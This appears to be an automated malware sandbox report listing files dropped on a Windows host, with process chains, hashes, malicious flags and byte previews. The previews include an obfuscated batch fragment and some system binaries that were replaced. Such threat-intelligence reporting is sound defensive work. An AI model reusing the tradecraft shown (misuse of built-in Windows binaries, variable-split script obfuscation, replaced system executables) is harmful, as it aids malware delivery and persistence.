                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C119D99F0ECE4DF512623B2BE48A2DA4FF748382F3A12697A17D079DC7A90CC5589090F850DA042A87E8A5444DDD56C59293F5FD7A21B1AF629468569BB9B54A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..............................................@...........................p...%...0...l.......................k...................................................w...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...0...........................idata...%...p...&..................@....tls....4............2...................rdata...............2..............@..@.reloc...k.......l...4..............@..B.rsrc....l...0...l..................@..@....................................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:pvn:Bn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:778300BD8587672716B777C1C3F07C14
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:29..

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Libraries\wdmvmswJ.cmd

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\Libraries\wdmvmswJ.pif

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\alpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Public\xpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wdmvmswJ.pif.log

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.356499146491567
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAt92n4M6:MLUE4K5E4Ke84j
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A76B6F2687EBB8D1431673D0F7DE1F23
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:99543B236437FC7CE320E06063ADF88EDE56D48F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A7B92434B657CB09F8CCC96911EA43F06DF4FE8873F3CE9CCA567753C96146FE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D61C66EC36431337897D8CB14676E574237AC3F0FC7621D09D2B1179455C6DEF5396D7130011F0D1B7961688D72350F769BD67088847AEB980FAB7A20F0E4613
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):28
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.601125010956985
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:rRSFYJKXzovNsr4:EFYJKDoWr4
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3EDC20402046A115DECDC253114161CC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:491936516B72BEC68CA4C36EBFE993BA4A3C2C0F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0429AAD3007C2D9B26ED655F02E94545BA94BD4CAA95E510C3AD163747CA725B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:076D8F83EBABFC31565AE1D0420F1703246619BCA6DD831E4AA0E6F7D6F5659AEF37BBC519B2F439683C16F55FA272CCBA04F5C534FDD530B7360150584D5BFB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:....### explorer ###..[WIN]

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\x.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1051648
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.894752592142907
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ZVb5KPAdOzVmG3zd+EIDT8Jf3pbV13Jks:ZVhOhd+EI8t5X
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F6D83CAF22A573E96F82D589F9C7C33D15D8D73B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED7C088C9E9F1F53F2627D68DEC62F0712062B382F307E032140D3715F2BB7C6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C119D99F0ECE4DF512623B2BE48A2DA4FF748382F3A12697A17D079DC7A90CC5589090F850DA042A87E8A5444DDD56C59293F5FD7A21B1AF629468569BB9B54A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..............................................@...........................p...%...0...l.......................k...................................................w...............................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...0...........................idata...%...p...&..................@....tls....4............2...................rdata...............2..............@..@.reloc...k.......l...4..............@..B.rsrc....l...0...l..................@..@....................................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\b2310dff430b0ac5.bin

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.985042476068835
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:VdEWW/ocs+q+brNs0/BhdYyiJZDbWptEFJu7Gav:VqB/ocs+pbr605vYyiJZDbE7n
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:FE864DB49CB463E73032E0D242C5367E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8BECD2AD983037D6031EC293C6404B1ACA504916
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:698D1C08B26765479C95747B8B73FEEAF5A324FB828525A47A7D6B651FF7BDFC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F058A1A0ED9EA97AF3ADC9C8B1F44C02A16AD430B6DEB2665799A7EFE6457255DE6777008DA44F1769030FA17729D9E4D704AC5421CD12D147327FE2227819FB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:.. 0....jBnDd.3.<...;.&.n5...~t...I.......-......r._.[..I...f.lj.;x.k:OG..F=.k.M............I@.Oi!.../..(....=../...|HJ.a..T.8V.;.}r.>....q.b.7..I5e.j.c...(._.....0.d.a$+...P...6..._....-@<D.'..k3 .....'......Ct.o..........q9S.yWM..)Dj.3....._?.8.ZN......Fu].>........RD.. 9..Qw?..-....B.[%....M.U..M..t<..|.|.......O...(. >.Um.....7=..~...d\#.f......N.u\..........B..^agj...C....gW.ru...&.u...{..3..E...cmckjs...2J..>[qS(LZ..$....)....0..`..=..OY...u~...qR..C..7.Dh.#....q..aKEZ..-..|x.rx..98.(.j..{.'R....4.B.5.n.u.U...E<... ...&....]m.............y........jI.d....1.~.<....a.V....3G.........grj.s.c.Y..n.bo.#..K..j.X./.....`..d._'.O<....3.,j.......v....N.}5.F..m9#..-Xu.+z..A...7,q=.s....M.b...X...H.....p..zf....H....k..h.4'......._b.....W......n.-....7.=b....x.-..@...Ul.C..r.jJ*...`D.U.Q.qhux...x..J.....v..-g...7.s......V.[ ND..#....I..m.Q.....t..N..h=..6.....V..+..A...u......~.a..#...^Y.z.VJ.,.1b..1.)...9./D{.....`Xw}or..u.vb......fE.2.A....l..

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\DtcInstall.log

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2313
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.13084650290537
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786V:Z070s0Y0q0mF7Dm5+
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:ECA8255C43049EEA486EE2466381D9AF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9BEB0EDD3AD8EFD4B8A16FA07BD5B15BBBC76A4E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7D4AEA768F96F47B562513CF885AD93F6A3C269B180268D474652E35A876588B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9958E769B057A726994A39B3B970DAFAF60284A515DB8A6DED706A25CCA6403899285D7967D43EE2B6B7B537643A6FDCDD5BB61B8E847D0DDAD923B6499565B6
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1150976
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.038934630004959
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:+HXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+HsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:66E9108DA1C020C738D8EA65CDBF5BE1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B0730F23D595508B9C1FA586EABAE04AC9D527E7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7997F74C4569B594F6A9897413C2C5BFE8883D9A607F7D00E0104A84C2E1BFA2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4231FBDE1A7F67E2EDCB157D7590D43FB284A89DF1E68A00FCDE9275EA5510220E5474AA9A0061198223C03183BDF5359D24F9ED0E3A4D9A0E3879737D92F33B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................U............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\AgentService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.9743696432741835
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:ZwVFr68Vw9wn/6h8N1zidKDmg27RnWGj:ZwVFrssC/dKD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6F7B504267DE8D9522B6B0A18A05A022
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:825F8ABE882CF48919F61C698F55B2B510E36C32
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:72EB763CDB1B158CF4514BB03DD606DEAD384B4FAF7862A44AA334BD3CD39C2A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F69E084825327F6936DE5AAEFA417482EE189BF56581D156140658B85025DBE3DDDB6DCD6607B622F3EA71E7B0656F83B80200182AD5AC2887D5C019EE88AC4D
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@....................................C..... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.253806475258096
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:sQW4qoNUgslKNX0Ip0MgHCpoMBOuvsqjnhMgeiCl7G0nehbGZpbD:sQW9BKNX0IPgiKMBOuTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:967B8B62127D887C6080C553324E82B9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D18E6AEA5BBD08158183AF89DD32E2F68ECEEB89
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:97BB569ECA1838720BE123F8E10D6C59093E10E6445480734EC02AD74BF27925
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5A7C26E43374524EB066E6E49D6F25D39E6D05D295E3132EB64213102E68FDED6C5257B213495F449253A16C03E2131A00EF9D7EF0E72DA88EC369C0A5AFBAFB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163580505896271
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:p2G7AbHjk4sqjnhMgeiCl7G0nehbGZpbD:p2G7AbHjRDmg27RnWGj
